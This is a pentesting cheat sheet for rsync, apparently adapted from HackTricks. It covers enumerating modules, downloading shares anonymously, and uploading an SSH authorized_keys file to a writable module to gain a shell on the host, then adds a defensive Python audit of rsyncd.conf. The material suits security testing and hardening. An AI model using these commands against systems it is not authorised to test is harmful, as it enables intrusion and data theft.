# Pentesting Rsync

## Rsync port 873

* Basic information
* [https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync](https://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync)
* [https://phoenixnap.com/kb/how-to-rsync-over-ssh](https://phoenixnap.com/kb/how-to-rsync-over-ssh)
* rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files.

```
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the server to list
raidroot             <--- The server starts enumerating
USBCopy        	
NAS_Public     	
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Server closes the connection


#Now let's try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password
```

* Enumerate shared folders
* An rsync module is essentially a directory share. These modules can optionally be protected by a password.
* These commands list the available modules and, optionally, determine whether each module requires a password to access:

```
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

#Example using IPv6 and a different port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```

* Manual Rsync
* List a shared folder

```
rsync -av --list-only rsync://10.10.232.5/shared_name
```

* Copy all files to your local machine via the following command:

```
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```

* If you have credentials you can list/download a shared name using (the password will be prompted):

```
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
proxychains rsync -av --list-only rsync://svc_ipmi@172.16.210.34/svc_rsync
```

* You could also upload some content using rsync (for example, in this case we can upload an `authorized_keys` file to obtain access to the box):

```
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
#full command syntax below
rsync -av id_rsa.pub rsync://rsync-connect@10.10.63.208/files/sys-internal/.ssh/authorized_keys
```

* Find the rsyncd configuration file:

```
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```

* The config file sometimes contains the parameter `secrets file = /path/to/file`; that file can contain the usernames and passwords allowed to authenticate to rsyncd.
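
The same `rsyncd.conf` is where the exposures above are fixed: modules with no `auth users`, writable modules, and modules with no `hosts allow`. The audit below is an added example, not from the original page or from the rsync project. The sample config is constructed, and the parser is simplified: it assumes global settings precede the first module and ignores line continuations and include directives.

```python
import re

# Constructed sample rsyncd.conf (not from the page); module names reuse the banner example.
SAMPLE_CONF = """\
secrets file = /etc/rsyncd.secrets

[NAS_Public]
    path = /volume1/public
    read only = no

[raidroot]
    path = /volume1/raidroot
    auth users = backup
    hosts allow = 192.168.0.0/24
"""

def parse_rsyncd_conf(text):
    """Return {module: params}; settings before the first [module] act as defaults."""
    defaults, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        section = re.fullmatch(r"\[(.+)\]", line)
        if section:
            current = modules.setdefault(section.group(1).strip(), dict(defaults))
        elif "=" in line:
            key, value = line.split("=", 1)  # only the first "=" is significant
            key = "".join(key.lower().split())  # drop whitespace in names; case folding is this example's choice
            (defaults if current is None else current)[key] = value.strip()
    return modules

def audit(modules):
    """Return {module: [findings]}; an empty list means none of the checks fired."""
    report = {}
    for name, p in modules.items():
        findings = []
        if not p.get("authusers"):
            findings.append("no 'auth users': anonymous access")
        elif not p.get("secretsfile"):
            findings.append("'auth users' set but no 'secrets file'")
        if p.get("readonly", "yes").lower() not in ("yes", "true", "1"):
            findings.append("writable: 'read only' is off")  # rsyncd defaults to read only
        if not p.get("hostsallow"):
            findings.append("no 'hosts allow' restriction")
        report[name] = findings
    return report

print(audit(parse_rsyncd_conf(SAMPLE_CONF)))
```

To audit a real host, pass the contents of the file located by the `find` command above to `parse_rsyncd_conf`, and check separately that the secrets file is not readable by other users.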

## Rsync Over SSH

```
rsync -av -e ssh rsync://user@host/share ./local-dir
rsync -av -e "ssh -p2222" rsync://user@host/share ./local-dir
```
